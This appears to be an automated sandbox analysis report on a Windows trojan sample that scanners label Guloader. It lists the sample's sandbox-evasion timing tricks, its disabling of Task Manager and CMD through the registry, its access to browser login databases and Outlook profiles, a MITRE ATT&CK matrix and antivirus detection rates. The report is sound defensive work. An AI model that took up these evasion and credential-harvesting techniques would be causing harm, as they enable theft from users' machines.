            Source: C:\Users\user\Desktop\czHx16QwGQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeAPI/Special instruction interceptor: Address: 519DD00
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeAPI/Special instruction interceptor: Address: 363DD00
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeRDTSC instruction interceptor: First address: 5163598 second address: 5163598 instructions: 0x00000000 rdtsc 0x00000002 test bl, 0000000Bh 0x00000005 cmp ebx, ecx 0x00000007 jc 00007F15F0EFAC40h 0x00000009 cmp eax, 78351A3Bh 0x0000000e inc ebp 0x0000000f inc ebx 0x00000010 test ecx, edx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeRDTSC instruction interceptor: First address: 3603598 second address: 3603598 instructions: 0x00000000 rdtsc 0x00000002 test bl, 0000000Bh 0x00000005 cmp ebx, ecx 0x00000007 jc 00007F15F0767E90h 0x00000009 cmp eax, 78351A3Bh 0x0000000e inc ebp 0x0000000f inc ebx 0x00000010 test ecx, edx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeMemory allocated: 120000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeMemory allocated: 361A0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeMemory allocated: 360A0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 599890Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 599671Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 599562Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 599453Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 599343Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 599221Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 599095Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 598962Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 598777Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 598671Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 598562Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 598453Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 598343Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 598223Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 598109Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 598000Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 597887Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 597781Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 597671Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 597562Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 597453Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 597343Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 597234Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 597125Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 597015Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 596906Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 596796Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 596687Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 596578Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 596468Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 596359Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 596250Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 596140Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 596031Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 595921Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 595812Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 595703Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 595593Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 595480Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 595374Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 595258Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 595154Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 595047Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 594937Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 594828Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 594718Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 594609Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 594500Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeWindow / User API: threadDelayed 1915Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeWindow / User API: threadDelayed 7929Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsqC9EA.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeAPI coverage: 3.4 %
            Source: C:\Users\user\Desktop\czHx16QwGQ.exe TID: 4884Thread sleep count: 35 > 30Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exe TID: 4884Thread sleep time: -32281802128991695s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exe TID: 4884Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exe TID: 1148Thread sleep count: 1915 > 30Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exe TID: 4884Thread sleep time: -599890s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exe TID: 1148Thread sleep count: 7929 > 30Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exe TID: 4884Thread sleep time: -599781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exe TID: 4884Thread sleep time: -599671s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exe TID: 4884Thread sleep time: -599562s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exe TID: 4884Thread sleep time: -599453s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exe TID: 4884Thread sleep time: -599343s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exe TID: 4884Thread sleep time: -599221s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exe TID: 4884Thread sleep time: -599095s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exe TID: 4884Thread sleep time: -598962s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exe TID: 4884Thread sleep time: -598777s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exe TID: 4884Thread sleep time: -598671s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exe TID: 4884Thread sleep time: -598562s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exe TID: 4884Thread sleep time: -598453s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exe TID: 4884Thread sleep time: -598343s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exe TID: 4884Thread sleep time: -598223s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exe TID: 4884Thread sleep time: -598109s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exe TID: 4884Thread sleep time: -598000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exe TID: 4884Thread sleep time: -597887s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exe TID: 4884Thread sleep time: -597781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exe TID: 4884Thread sleep time: -597671s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exe TID: 4884Thread sleep time: -597562s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exe TID: 4884Thread sleep time: -597453s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exe TID: 4884Thread sleep time: -597343s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exe TID: 4884Thread sleep time: -597234s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exe TID: 4884Thread sleep time: -597125s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exe TID: 4884Thread sleep time: -597015s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exe TID: 4884Thread sleep time: -596906s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exe TID: 4884Thread sleep time: -596796s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exe TID: 4884Thread sleep time: -596687s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exe TID: 4884Thread sleep time: -596578s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exe TID: 4884Thread sleep time: -596468s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exe TID: 4884Thread sleep time: -596359s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exe TID: 4884Thread sleep time: -596250s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exe TID: 4884Thread sleep time: -596140s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exe TID: 4884Thread sleep time: -596031s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exe TID: 4884Thread sleep time: -595921s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exe TID: 4884Thread sleep time: -595812s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exe TID: 4884Thread sleep time: -595703s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exe TID: 4884Thread sleep time: -595593s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exe TID: 4884Thread sleep time: -595480s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exe TID: 4884Thread sleep time: -595374s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exe TID: 4884Thread sleep time: -595258s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exe TID: 4884Thread sleep time: -595154s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exe TID: 4884Thread sleep time: -595047s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exe TID: 4884Thread sleep time: -594937s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exe TID: 4884Thread sleep time: -594828s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exe TID: 4884Thread sleep time: -594718s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exe TID: 4884Thread sleep time: -594609s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exe TID: 4884Thread sleep time: -594500s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 0_2_0040672B FindFirstFileW,FindClose,0_2_0040672B
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 0_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,0_2_00405AFA
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_00402868 FindFirstFileW,5_2_00402868
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_0040672B FindFirstFileW,FindClose,5_2_0040672B
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,5_2_00405AFA
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 599890Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 599671Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 599562Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 599453Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 599343Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 599221Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 599095Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 598962Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 598777Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 598671Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 598562Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 598453Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 598343Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 598223Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 598109Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 598000Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 597887Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 597781Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 597671Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 597562Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 597453Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 597343Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 597234Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 597125Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 597015Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 596906Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 596796Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 596687Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 596578Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 596468Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 596359Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 596250Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 596140Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 596031Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 595921Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 595812Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 595703Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 595593Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 595480Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 595374Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 595258Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 595154Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 595047Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 594937Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 594828Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 594718Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 594609Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeThread delayed: delay time: 594500Jump to behavior
            Source: czHx16QwGQ.exe, 00000005.00000002.2725015307.0000000005C2F000.00000004.00000020.00020000.00000000.sdmp, czHx16QwGQ.exe, 00000005.00000002.2725015307.0000000005BD8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeAPI call chain: ExitProcess graph end nodegraph_0-4579
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeAPI call chain: ExitProcess graph end nodegraph_0-4735
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 0_2_00406943 GlobalFree,LdrInitializeThunk,GlobalAlloc,GlobalFree,LdrInitializeThunk,GlobalAlloc,0_2_00406943
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 0_2_73961B5F LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,lstrcpyW,GlobalFree,LdrInitializeThunk,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,LdrInitializeThunk,LdrInitializeThunk,GetModuleHandleW,LdrInitializeThunk,LoadLibraryW,GetProcAddress,lstrlenW,0_2_73961B5F
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeProcess created: C:\Users\user\Desktop\czHx16QwGQ.exe "C:\Users\user\Desktop\czHx16QwGQ.exe"Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeQueries volume information: C:\Users\user\Desktop\czHx16QwGQ.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 0_2_004034A5 EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,lstrlenA,LdrInitializeThunk,#17,OleInitialize,LdrInitializeThunk,SHGetFileInfoW,GetCommandLineW,CharNextW,LdrInitializeThunk,GetTempPathW,LdrInitializeThunk,GetTempPathW,GetWindowsDirectoryW,lstrcatW,LdrInitializeThunk,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,0_2_004034A5
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Lowering of HIPS / PFW / Operating System Security Settings

            barindex
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeRegistry value created: DisableTaskMgr 1Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeRegistry value created: DisableCMD 1Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgrJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000005.00000002.2745533594.00000000362FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: czHx16QwGQ.exe PID: 5296, type: MEMORYSTR
            Source: Yara matchFile source: 00000005.00000002.2745533594.00000000362FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: czHx16QwGQ.exe PID: 5296, type: MEMORYSTR
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Yara matchFile source: 00000005.00000002.2745533594.00000000362FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: czHx16QwGQ.exe PID: 5296, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000005.00000002.2745533594.00000000362FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: czHx16QwGQ.exe PID: 5296, type: MEMORYSTR
            Source: Yara matchFile source: 00000005.00000002.2745533594.00000000362FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: czHx16QwGQ.exe PID: 5296, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API
            1
            DLL Side-Loading
            1
            Access Token Manipulation
            1
            Masquerading
            1
            OS Credential Dumping
            21
            Security Software Discovery
            Remote Services1
            Email Collection
            1
            Web Service
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
            Process Injection
            31
            Disable or Modify Tools
            LSASS Memory31
            Virtualization/Sandbox Evasion
            Remote Desktop Protocol1
            Archive Collected Data
            21
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading
            31
            Virtualization/Sandbox Evasion
            Security Account Manager1
            Application Window Discovery
            SMB/Windows Admin Shares1
            Data from Local System
            1
            Ingress Tool Transfer
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Access Token Manipulation
            NTDS1
            System Network Configuration Discovery
            Distributed Component Object Model1
            Clipboard Data
            3
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Process Injection
            LSA Secrets2
            File and Directory Discovery
            SSHKeylogging14
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Deobfuscate/Decode Files or Information
            Cached Domain Credentials215
            System Information Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
            Obfuscated Files or Information
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            czHx16QwGQ.exe75%VirustotalBrowse
            czHx16QwGQ.exe63%ReversingLabsWin32.Trojan.Guloader
            czHx16QwGQ.exe100%AviraHEUR/AGEN.1337946
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nsqC9EA.tmp\System.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\nsqC9EA.tmp\System.dll0%VirustotalBrowse
            No Antivirus matches
            No Antivirus matches
